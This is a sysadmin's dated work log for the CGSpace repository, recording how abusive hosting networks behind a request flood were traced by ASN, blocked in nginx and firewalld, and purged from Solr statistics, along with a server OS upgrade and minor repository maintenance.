  • The load on CGSpace is 45.00… the nginx access.log is going so fast I can’t even read it +
      +
    • I see lots of IPs from AS206485 that are changing their user agents (Linux, Windows, macOS…)
    • +
    • This is finegroupservers.com aka “UGB - UGB Hosting OU”
    • +
    • I will get a list of their IP blocks from ipinfo.app and block them in nginx
    • +
    • There is another group of IPs that are owned by an ISP called “TrafficTransitSolution LLC” that does not have its own ASN unfortunately
    • +
    • “TrafficTransitSolution LLC” seems to be affiliated with AS206485 (UGB Hosting OU) anyways, but they sometimes use AS49453 (Global Layer B.V.) also
    • +
    • I found a tool that lets you grep a file by CIDR, so I can use that to purge hits from Solr eventually:
    • +
    +
  • +
+
# grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
+     32 91.243.191.124
+     33 91.243.191.129
+     33 91.243.191.200
+     34 91.243.191.115
+     34 91.243.191.154
+     34 91.243.191.234
+     34 91.243.191.56
+     35 91.243.191.187
+     35 91.243.191.91
+     36 91.243.191.58
+     37 91.243.191.209
+     39 91.243.191.119
+     39 91.243.191.144
+     39 91.243.191.55
+     40 91.243.191.112
+     40 91.243.191.182
+     40 91.243.191.57
+     40 91.243.191.98
+     41 91.243.191.106
+     44 91.243.191.79
+     45 91.243.191.151
+     46 91.243.191.103
+     56 91.243.191.172
+
    +
  • I found a few people complaining about these Russian attacks too: + +
  • +
  • According to AbuseIPDB.com and whois data provided by the asn tool, I see these organizations, networks, and ISPs all seem to be related: +
      +
    • Sharktech
    • +
    • LIR LLC / lir.am
    • +
    • TrafficTransitSolution LLC / traffictransitsolution.us
    • +
    • Fine Group Servers Solutions LLC / finegroupservers.com
    • +
    • UGB
    • +
    • Bulgakov Alexey Yurievich
    • +
    • Dmitry Vorozhtsov / fitz-isp.uk / UGB
    • +
    • Auction LLC / dauction.ru / UGB / traffictransitsolution.us
    • +
    • Alax LLC / alaxona.com / finegroupservers.com
    • +
    • Sysoev Aleksey Anatolevich / jobbuzzactiv.com / traffictransitsolution.us
    • +
    • Bulgakov Alexey Yurievich / UGB / blockchainnetworksolutions.co.uk / info@finegroupservers.com
    • +
    • UAB Rakrejus
    • +
    +
  • +
  • I looked in the nginx log and copied a few IP addresses that were suspicious +
      +
    • First I looked them up in AbuseIPDB.com to get the ISP name and website
    • +
    • Then I looked them up with the asn tool, ie:
    • +
    +
  • +
+
$ ./asn -n 45.80.217.235  
+
+╭──────────────────────────────╮
+│ ASN lookup for 45.80.217.235 │
+╰──────────────────────────────╯
+
+ 45.80.217.235 ┌PTR -
+               ├ASN 46844 (ST-BGP, US)
+               ├ORG Sharktech
+               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
+               ├ABU info@traffictransitsolution.us
+               ├ROA ✓ VALID (1 ROA found)
+               ├TYP  Proxy host   Hosting/DC 
+               ├GEO Los Angeles, California (US)
+               └REP ✓ NONE
+
    +
  • Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:
  • +
+
IP, Organization, Website, Network
+45.148.126.246, TrafficTransitSolution LLC, traffictransitsolution.us, 45.148.126.0/24 (Net-traffictransitsolution-15)
+45.138.102.253, TrafficTransitSolution LLC, traffictransitsolution.us, 45.138.102.0/24 (Net-traffictransitsolution-11)
+45.140.205.104, Bulgakov Alexey Yurievich, finegroupservers.com, 45.140.204.0/23 (CHINA_NETWORK)
+185.68.247.63, Fine Group Servers Solutions LLC, finegroupservers.com, 185.68.247.0/24 (Net-finegroupservers-18)
+213.232.123.188, Fine Group Servers Solutions LLC, finegroupservers.com, 213.232.123.0/24 (Net-finegroupservers-12)
+45.80.217.235, TrafficTransitSolution LLC, traffictransitsolution.us, 45.80.217.0/24 (TrafficTransitSolutionNet)
+185.81.144.202, Fine Group Servers Solutions LLC, finegroupservers.com, 185.81.144.0/24 (Net-finegroupservers-19)
+109.106.22.114, TrafficTransitSolution LLC, traffictransitsolution.us, 109.106.22.0/24 (TrafficTransitSolutionNet)
+185.68.247.200, Fine Group Servers Solutions LLC, finegroupservers.com, 185.68.247.0/24 (Net-finegroupservers-18)
+45.80.105.252, Bulgakov Alexey Yurievich, finegroupservers.com, 45.80.104.0/23 (NET-BNSL2-1)
+185.233.187.156, Dmitry Vorozhtsov, mgn-host.ru, 185.233.187.0/24 (GB-FITZISP-20181106)
+185.88.100.75, TrafficTransitSolution LLC, traffictransitsolution.us, 185.88.100.0/24 (Net-traffictransitsolution-17)
+194.104.8.154, TrafficTransitSolution LLC, traffictransitsolution.us, 194.104.8.0/24 (Net-traffictransitsolution-37)
+185.102.112.46, Fine Group Servers Solutions LLC, finegroupservers.com, 185.102.112.0/24 (Net-finegroupservers-13)
+212.193.12.64, Fine Group Servers Solutions LLC, finegroupservers.com, 212.193.12.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+91.243.191.129, Auction LLC, dauction.ru, 91.243.191.0/24 (TR-QN-20180917)
+45.148.232.161, Nikolaeva Ekaterina Sergeevna, blockchainnetworksolutions.co.uk, 45.148.232.0/23 (LONDON_NETWORK)
+147.78.181.191, TrafficTransitSolution LLC, traffictransitsolution.us, 147.78.181.0/24 (Net-traffictransitsolution-58)
+77.83.27.90, Alax LLC, alaxona.com, 77.83.27.0/24 (FINEGROUPSERVERS-LEASE)
+185.250.46.119, Dmitry Vorozhtsov, mgn-host.ru, 185.250.46.0/23 (GB-FITZISP-20181106)
+94.231.219.106, LIR LLC, lir.am, 94.231.219.0/24 (CN-NET-219)
+45.12.65.56, Sysoev Aleksey Anatolevich, jobbuzzactiv.com / traffictransitsolution.us, 45.12.65.0/24 (TrafficTransitSolutionNet)
+45.140.206.31, Bulgakov Alexey Yurievich, blockchainnetworksolutions.co.uk / info@finegroupservers.com, 45.140.206.0/23 (FRANKFURT_NETWORK)
+84.54.57.130, LIR LLC, lir.am / traffictransitsolution.us, 84.54.56.0/23 (CN-FTNET-5456)
+178.20.214.235, Alaxona Internet Inc., alaxona.com / finegroupservers.com, 178.20.214.0/24 (FINEGROUPSERVERS-LEASE)
+37.44.253.204, Atex LLC, atex.ru / blockchainnetworksolutions.co.uk, 37.44.252.0/23 (NL-FTN-44252)
+46.161.61.242, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru, 46.161.61.0/24 (FineTransitDE)
+194.87.113.141, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.113.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+109.94.223.217, LIR LLC, lir.am / traffictransitsolution.us, 109.94.223.0/24 (CN-NET-223)
+94.231.217.115, LIR LLC, lir.am / traffictransitsolution.us, 94.231.217.0/24 (TR-NET-217)
+146.185.202.214, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net, 146.185.202.0/24 (FineTransitRU)
+194.58.68.110, Fine Group Servers Solutions LLC, finegroupservers.com, 194.58.68.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+94.154.131.237, TrafficTransitSolution LLC, traffictransitsolution.us, 94.154.131.0/24 (TrafficTransitSolutionNet)
+193.202.8.245, Fine Group Servers Solutions LLC, finegroupservers.com, 193.202.8.0/21 (FTL5)
+212.192.27.33, Fine Group Servers Solutions LLC, finegroupservers.com, 212.192.27.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+193.202.87.218, Fine Group Servers Solutions LLC, finegroupservers.com, 193.202.84.0/22 (FTEL-2)
+146.185.200.52, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net, 146.185.200.0/24 (FineTransitRU)
+194.104.11.11, TrafficTransitSolution LLC, traffictransitsolution.us, 194.104.11.0/24 (Net-traffictransitsolution-40)
+185.50.250.145, ATOMOHOST LLC, atomohost.com, 185.50.250.0/24 (Silverstar_Invest_Limited)
+37.9.46.68, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru / abuse@ripe.net / , 37.9.44.0/22 (QUALITYNETWORK)
+185.81.145.14, Fine Group Servers Solutions LLC, finegroupservers.com, 185.81.145.0/24 (Net-finegroupservers-20)
+5.183.255.72, TrafficTransitSolution LLC, traffictransitsolution.us, 5.183.255.0/24 (Net-traffictransitsolution-32)
+84.54.58.204, LIR LLC, lir.am / traffictransitsolution.us, 84.54.58.0/24 (GB-BTTGROUP-20181119)
+109.236.55.175, Mosnet LLC, mosnetworks.ru / info@traffictransitsolution.us, 109.236.55.0/24 (CN-NET-55)
+5.133.123.184, Mosnet LLC, mosnet.ru / abuse@blockchainnetworksolutions.co.uk, 5.133.123.0/24 (DE-NET5133123)
+5.181.168.90, Fine Group Servers Solutions LLC, finegroupservers.com, 5.181.168.0/24 (Net-finegroupservers-5)
+185.61.217.86, TrafficTransitSolution LLC, traffictransitsolution.us, 185.61.217.0/24 (Net-traffictransitsolution-46)
+217.145.227.84, TrafficTransitSolution LLC, traffictransitsolution.us, 217.145.227.0/24 (Net-traffictransitsolution-64)
+193.56.75.29, Auction LLC, dauction.ru / abuse@blockchainnetworksolutions.co.uk, 193.56.75.0/24 (CN-NET-75)
+45.132.184.212, TrafficTransitSolution LLC, traffictransitsolution.us, 45.132.184.0/24 (Net-traffictransitsolution-5)
+45.10.167.239, TrafficTransitSolution LLC, traffictransitsolution.us, 45.10.167.0/24 (Net-traffictransitsolution-28)
+109.94.222.106, Express Courier LLC, expcourier.ru / info@traffictransitsolution.us, 109.94.222.0/24 (IN-NET-222)
+62.76.232.218, Fine Group Servers Solutions LLC, finegroupservers.com, 62.76.232.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+147.78.183.221, TrafficTransitSolution LLC, traffictransitsolution.us, 147.78.183.0/24 (Net-traffictransitsolution-60)
+94.158.22.202, Auction LLC, dauction.ru / info@traffictransitsolution.us, 94.158.22.0/24 (FR-QN-20180917)
+85.202.194.33, Mosnet LLC, mosnet.ru / info@traffictransitsolution.us, 85.202.194.0/24 (DE-QN-20180917)
+193.187.93.150, Fine Group Servers Solutions LLC, finegroupservers.com, 193.187.92.0/22 (FTL3)
+185.250.45.149, Dmitry Vorozhtsov, mgn-host.ru / abuse@fitz-isp.uk, 185.250.44.0/23 (GB-FITZISP-20181106)
+185.50.251.75, ATOMOHOST LLC, atomohost.com, 185.50.251.0/24 (Silverstar_Invest_Limited)
+5.183.254.117, TrafficTransitSolution LLC, traffictransitsolution.us, 5.183.254.0/24 (Net-traffictransitsolution-31)
+45.132.186.187, TrafficTransitSolution LLC, traffictransitsolution.us, 45.132.186.0/24 (Net-traffictransitsolution-7)
+83.171.252.105, Teleport LLC, teleport.az / abuse@blockchainnetworksolutions.co.uk, 83.171.252.0/23 (DE-FTNET-252)
+45.148.127.37, TrafficTransitSolution LLC, traffictransitsolution.us, 45.148.127.0/24 (Net-traffictransitsolution-16)
+194.87.115.133, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.115.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+193.233.250.100, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.250.0/24 (TrafficTransitSolutionNet)
+194.87.116.246, Fine Group Servers Solutions LLC, finegroupservers.com, 194.87.116.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+195.133.25.244, Fine Group Servers Solutions LLC, finegroupservers.com, 195.133.25.0/24 (FINE_GROUP_SERVERS_SOLUTIONS_LLC)
+77.220.194.159, Fine Group Servers Solutions LLC, finegroupservers.com, 77.220.194.0/24 (Net-finegroupservers-3)
+185.89.101.177, ATOMOHOST LLC, atomohost.com, 185.89.100.0/23 (QUALITYNETWORK)
+193.151.191.133, Alax LLC, alaxona.com / info@finegroupservers.com, 193.151.191.0/24 (FINEGROUPSERVERS-LEASE)
+5.181.170.147, Fine Group Servers Solutions LLC, finegroupservers.com, 5.181.170.0/24 (Net-finegroupservers-7)
+193.233.249.167, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.249.0/24 (TrafficTransitSolutionNet)
+46.161.59.90, Petersburg Internet Network Ltd., pinspb.ru / abusemail@depo40.ru, 46.161.59.0/24 (FineTransitJP)
+213.108.3.74, TrafficTransitSolution LLC, traffictransitsolution.us, 213.108.3.0/24 (Net-traffictransitsolution-24)
+193.233.251.238, OOO Freenet Group, free.net / abuse@vmage.ru, 193.233.251.0/24 (TrafficTransitSolutionNet)
+178.20.215.224, Alaxona Internet Inc., alaxona.com / info@finegroupservers.com, 178.20.215.0/24 (FINEGROUPSERVERS-LEASE)
+45.159.22.199, Server LLC, ixserv.ru / info@finegroupservers.com, 45.159.22.0/24 (FINEGROUPSERVERS-LEASE)
+109.236.53.244, Mosnet LLC, mosnet.ru, info@traffictransitsolution.us, 109.236.53.0/24 (TR-NET-53)
+
    +
  • I found a better way to get the ASNs using my resolve-addresses-geoip2.py script +
      +
    • First, get a list of all IPs making requests to nginx today:
    • +
    +
  • +
+
# grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq  > /tmp/ips-sorted.txt
+# wc -l /tmp/ips-sorted.txt 
+10776 /tmp/ips-sorted.txt
+
    +
  • Then resolve them all:
  • +
+
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
+
    +
  • Then get the top 10 organizations and top ten ASNs:
  • +
+
$ csvcut -c 2 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+    213 AMAZON-AES
+    218 ASN-QUADRANET-GLOBAL
+    246 Silverstar Invest Limited
+    347 Ethiopian Telecommunication Corporation
+    475 DEDIPATH-LLC
+    504 AS-COLOCROSSING
+    598 UAB Rakrejus
+    814 UGB Hosting OU
+   1010 ST-BGP
+   1757 Global Layer B.V.
+$ csvcut -c 3 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+    213 14618
+    218 8100
+    246 35624
+    347 24757
+    475 35913
+    504 36352
+    598 62282
+    814 206485
+   1010 46844
+   1757 49453
+
    +
  • I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I’m concerned about Global Layer because it’s a huge ASN that seems to have legit hosts too…?
  • +
+
$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
+$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
+$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
+$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
+$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
+$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
+$ cat AS* | sort | uniq > /tmp/abusive-networks.txt
+$ wc -l /tmp/abusive-networks.txt 
+2276 /tmp/abusive-networks.txt
+
    +
  • Combining with my existing rules and filtering uniques:
  • +
+
$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
+2298
+
    +
  • According to Scamalytics all these are high risk ISPs (as recently as 2021-06) so I will just keep blocking them
  • +
  • I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through… sigh
  • +
  • The next thing I need to do is purge all the IPs from Solr using grepcidr…
  • +
+
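  • That purge would look roughly like this (a sketch: /tmp/abusive-cidrs.txt is a hypothetical file with one bare network per line, fed to the same check-spider-ip-hits.sh script I use elsewhere):

# grepcidr -f /tmp/abusive-cidrs.txt /var/log/nginx/access.log | awk '{print $1}' | sort -u > /tmp/abusive-ips.txt
$ ./ilri/check-spider-ip-hits.sh -f /tmp/abusive-ips.txt -p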

2021-07-18

+
    +
  • After blocking all the ASN network blocks yesterday I still see requests getting through from these abusive networks, so the ASN lists must be out of date +
      +
    • I decided to get a list of all the IPs that made requests on the server in the last two days, resolve them, and then pull out the ones belonging to these ASNs: 206485, 35624, 36352, 46844, 49453, 62282
    • +
    +
  • +
+
$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E " (200|499) " | awk '{print $1}' | sort | uniq > /tmp/all-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
+$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/all-ips-to-block.txt
+$ wc -l /tmp/all-ips-to-block.txt 
+5095 /tmp/all-ips-to-block.txt
+
    +
  • Then I added them to the normal ipset we are already using with firewalld (roughly as sketched at the end of this section) +
      +
    • I will check again in a few hours and ban more
    • +
    +
  • +
  • I decided to extract the networks from the GeoIP database with resolve-addresses-geoip2.py so I can block them more efficiently than using the 5,000 IPs in an ipset:
  • +
+
$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/all-networks-to-block.txt
+$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
+2354
+
    +
  • Combined with the previous networks this brings about 200 more for a total of 2,354 networks +
      +
    • I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from Spamhaus’s DROP and EDROP lists, for example)
    • +
    +
  • +
  • Then I got a list of all the 5,095 IPs from above and used check-spider-ip-hits.sh to purge them from Solr:
  • +
+
$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
+...
+Total number of bot hits purged: 197116
+
    +
  • I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level
  • +
+
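  • For the record, adding a batch of IPs to the firewalld ipset mentioned above looks roughly like this (a sketch; the ipset name "abusers" is hypothetical):

# firewall-cmd --permanent --ipset=abusers --add-entries-from-file=/tmp/all-ips-to-block.txt
# firewall-cmd --reload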

2021-07-20

+
    +
  • Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, the count is much higher than I noticed yesterday:
  • +
+
$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
+5643
+
    +
  • I purged 27,000 more hits from the Solr stats using this new list of IPs with my check-spider-ip-hits.sh script
  • +
  • Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!
  • +
+
$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/all-ips-june-23.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
+$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 15
+    265 GOOGLE,15169
+    277 Silverstar Invest Limited,35624
+    280 FACEBOOK,32934
+    288 SAFARICOM-LIMITED,33771
+    399 AMAZON-AES,14618
+    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
+    455 Opera Software AS,39832
+    481 MTN NIGERIA Communication limited,29465
+    502 DEDIPATH-LLC,35913
+    506 AS-COLOCROSSING,36352
+    602 UAB Rakrejus,62282
+    822 ST-BGP,46844
+    874 Ethiopian Telecommunication Corporation,24757
+    912 UGB Hosting OU,206485
+   1607 Global Layer B.V.,49453
+
    +
  • Again it was over 5,000 IPs:
  • +
+
$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
+5228
+
    +
  • Interestingly, it seems these are a different five thousand IP addresses than the ones from the attack last weekend, as there are over 10,000 unique ones if I combine them!
  • +
+
$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
+10458
+
    +
  • I purged all the (26,000) hits from these new IP addresses from Solr as well
  • +
  • Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)… +
      +
    • Also, I took a closer look at QuadraNet (AS8100) and found some association with ATOMOHOST LLC and finegroupservers.com and traffictransitsolution.us, so now I need to block/purge that ASN too!
    • +
    • I saw it on the Scamalytics 2021-06 list anyways, so at this point I have no doubt
    • +
    +
  • +
  • Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/ddos-ips.txt
+# wc -l /tmp/ddos-ips.txt 
+54002 /tmp/ddos-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
+$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/ddos-ips-to-purge.txt
+$ wc -l /tmp/ddos-ips-to-purge.txt
+10900 /tmp/ddos-ips-to-purge.txt
+$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/ddos-networks-to-block.txt
+$ wc -l /tmp/ddos-networks-to-block.txt
+262 /tmp/ddos-networks-to-block.txt
+
    +
  • The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:
  • +
+
$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 \
+https://asn.ipinfo.app/api/text/nginx/AS46844 \
+https://asn.ipinfo.app/api/text/nginx/AS206485 \
+https://asn.ipinfo.app/api/text/nginx/AS62282 \
+https://asn.ipinfo.app/api/text/nginx/AS36352 \
+https://asn.ipinfo.app/api/text/nginx/AS35913 \
+https://asn.ipinfo.app/api/text/nginx/AS35624 \
+https://asn.ipinfo.app/api/text/nginx/AS8100
+$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
+4007
+
    +
  • I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs
  • +
+

2021-07-22

+
    +
  • Udana emailed to say that the link to the iwmi.csv export isn’t working +
      +
    • I looked and both the nginx config and systemd service unit were using invalid paths…
    • +
    • I’m not sure why it had been working for so long until now!
    • +
    +
  • +
  • Maria Garruccio asked if we can move the “Context” menu up to the top of the right-hand sidebar navigation menu +
      +
    • The last time we changed this was in 2020 (XMLUI’s Navigation.java), and I think it makes a lot of sense so I moved it up, under the account block:
    • +
    +
  • +
+

CGSpace XMLUI navigation

+

2021-07-23

+
    +
  • Spend some time reviewing patches for the upcoming DSpace 6.4 release
  • +
+

2021-07-24

+
    +
  • Spend some time reviewing patches for the upcoming DSpace 6.4 release
  • +
  • Run all system updates on DSpace Test (linode26) and reboot it
  • +
+

2021-07-29


August, 2021


2021-08-01

+
    +
  • Update Docker images on AReS server (linode20) and reboot the server:
  • +
+
# docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
    +
  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
  • +
+
    +
  • First running all existing updates, taking some backups, checking for broken packages, and then rebooting:
  • +
+
# apt update && apt dist-upgrade
+# apt autoremove && apt autoclean
+# check for any packages with residual configs we can purge
+# dpkg -l | grep -E '^rc' | awk '{print $2}'
+# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
+# dpkg -C
+# dpkg -l > 2021-08-01-linode20-dpkg.txt
+# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
+# reboot
+# sed -i 's/bionic/focal/' /etc/apt/sources.list.d/*.list
+# do-release-upgrade
+
    +
  • … but of course it hit the libxcrypt bug
  • +
  • I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually
  • +
+
# apt install -f
+# apt dist-upgrade
+# reboot
+
    +
  • After rebooting I purged all packages with residual configs and cleaned up again:
  • +
+
# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
+# apt autoremove && apt autoclean
+
+

2021-08-02

+
    +
  • Help Udana with OAI validation on CGSpace + +
  • +
+

2021-08-03

+
    +
  • Run fresh re-harvest on AReS
  • +
+

2021-08-05

+
    +
  • Have a quick call with Mishell Portilla from CIP about a journal article that was flagged as being in a predatory journal (Beall’s List) +
      +
    • We agreed to unmap it from RTB’s collection for now, and I asked for advice from Peter and Abenet for what to do in the future
    • +
    +
  • +
  • A developer from the Alliance asked for access to the CGSpace database so they can make some integration with PowerBI +
      +
    • I told them we don’t allow direct database access, and that it would be tricky anyways (that’s what APIs are for!)
    • +
    +
  • +
  • I’m curious if there are still any requests coming in to CGSpace from the abusive Russian networks +
      +
    • I extracted all the unique IPs that nginx processed in the last week:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/2021-08-05-all-ips.txt
+# wc -l /tmp/2021-08-05-all-ips.txt
+43428 /tmp/2021-08-05-all-ips.txt
+
    +
  • Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!) +
      +
    • Indeed, now I see that there are no IPs from those networks coming in now:
    • +
    +
  • +
+
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
+$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/2021-08-05-all-ips-to-purge.csv
+$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
+0 /tmp/2021-08-05-all-ips-to-purge.csv
+

2021-08-08

+
    +
  • Advise IWMI colleagues on best practices for thumbnails
  • +
  • Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest +
      +
    • I sent a message to Jacquie from WorldFish to ask if I can help her clean up the incorrect countries and regions in their repository, for example:
    • +
    • WorldFish countries: Aegean, Euboea, Caribbean Sea, Caspian Sea, Chilwa Lake, Imo River, Indian Ocean, Indo-pacific
    • +
    • WorldFish regions: Black Sea, Arabian Sea, Caribbean Sea, California Gulf, Mediterranean Sea, North Sea, Red Sea
    • +
    +
  • +
  • Looking at the July Solr statistics to find the top IP and user agents, looking for anything strange +
      +
    • 35.174.144.154 made 11,000 requests last month with the following user agent:
    • +
    +
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
+
    +
  • That IP is on Amazon, and from looking at the DSpace logs I don’t see them logging in at all, only scraping… so I will purge hits from that IP
  • +
  • I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, I will purge their hits too +
      +
    • Same deal with 130.255.162.173, which is also in Sweden and makes requests every five seconds or so
    • +
    • Same deal with 93.158.90.91, also in Sweden
    • +
    +
  • +
  • 3.225.28.105 uses a normal-looking user agent but makes thousands of request to the REST API a few seconds apart
  • +
  • 61.143.40.50 is in China and uses this hilarious user agent:
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}"
+
    +
  • 47.252.80.214 is owned by Alibaba in the US and has the same user agent
  • +
  • 159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours
  • +
  • 95.87.154.12 seems to be a new bot with the following user agent:
  • +
+
Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
+
    +
  • They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU +
      +
    • I will purge the hits and add them to our list of bot overrides in the mean time before I submit it to COUNTER-Robots
    • +
    +
  • +
  • I see a new bot using this user agent:
  • +
+
nettle (+https://www.nettle.sk)
+
    +
  • 129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.
  • +
  • 217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day
  • +
  • 103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human
  • +
  • There are probably more, but those are most of the ones with over 1,000 hits last month, so I will purge them:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 10796 hits from 35.174.144.154 in statistics
+Purging 9993 hits from 93.158.90.30 in statistics
+Purging 6092 hits from 130.255.162.173 in statistics
+Purging 24863 hits from 3.225.28.105 in statistics
+Purging 2988 hits from 93.158.90.91 in statistics
+Purging 2497 hits from 61.143.40.50 in statistics
+Purging 13866 hits from 159.138.131.15 in statistics
+Purging 2721 hits from 95.87.154.12 in statistics
+Purging 2786 hits from 47.252.80.214 in statistics
+Purging 1485 hits from 129.0.211.251 in statistics
+Purging 8952 hits from 217.182.21.193 in statistics
+Purging 3446 hits from 103.135.104.139 in statistics
+
